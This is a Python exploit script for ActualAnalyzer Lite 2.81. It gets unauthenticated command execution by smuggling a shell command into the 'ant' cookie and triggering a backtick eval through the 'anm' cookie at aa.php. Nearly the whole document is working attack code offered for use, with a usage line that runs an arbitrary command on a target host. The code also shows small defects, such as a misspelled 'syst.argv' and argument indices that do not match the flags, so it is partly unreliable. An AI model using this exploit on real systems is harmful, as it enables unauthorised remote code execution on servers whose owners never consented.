ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution

###############################

# ActualAnalyzer exploit.

# Tested on Lite version

# We load command into a dummy variable as we only have 6 characters to own the eval

# but load more as first 2 characters get rm'd.

# We then execute the eval with backticks.

# 11/05/2011

##############################

import urllib

import urllib2

import sys

import time

def banner():

print

"     ____                        __              __                  __                     "

print " / __/_ ______ _ ____ ______/ /___ ______ _/ /___ _____ ____ _/ /_ ______ ___ _____"

print " / /_/ / / / __ `// __ `/ ___/ __/ / / / __ `/ / __ `/ __ \/ __ `/ / / / /_ / / _ \/ ___/"

print " / __/ /_/ / /_/ // /_/ / /__/ /_/ /_/ / /_/ / / /_/ / / / / /_/ / / /_/ / / /_/ __/ / "

print " /_/ \__,_/\__, (_)__,_/\___/\__/\__,_/\__,_/_/\__,_/_/ /_/\__,_/_/\__, / /___/\___/_/ "

print

"              /_/                                                  /____/                   "

def usage():

print " [+] Usage:"

print " [-] python " + sys.argv[0] + " -h vulnHOST -d analyticdomain -c \"command\""

print " [-] python fuq.actualanalyzer.py -h test.com/lite -d analyticdomain -c \"touch /tmp/123\""

banner()

if len(sys.argv) < 6:

usage()

quit()

domain = sys.argv[2]

command = sys.argv[6]

host = syst.argv[4]

def commandexploit(domain,host,command):

url = 'http://' + domain + '/aa.php?anp=' + host

data = None

headers = {'Cookie': "ant=" + command + "; anm=414.`$cot`"}

exploit1 = urllib2.Request(url,data,headers)

exploit2 = urllib2.urlopen(exploit1)

commandexploit(domain,host,command)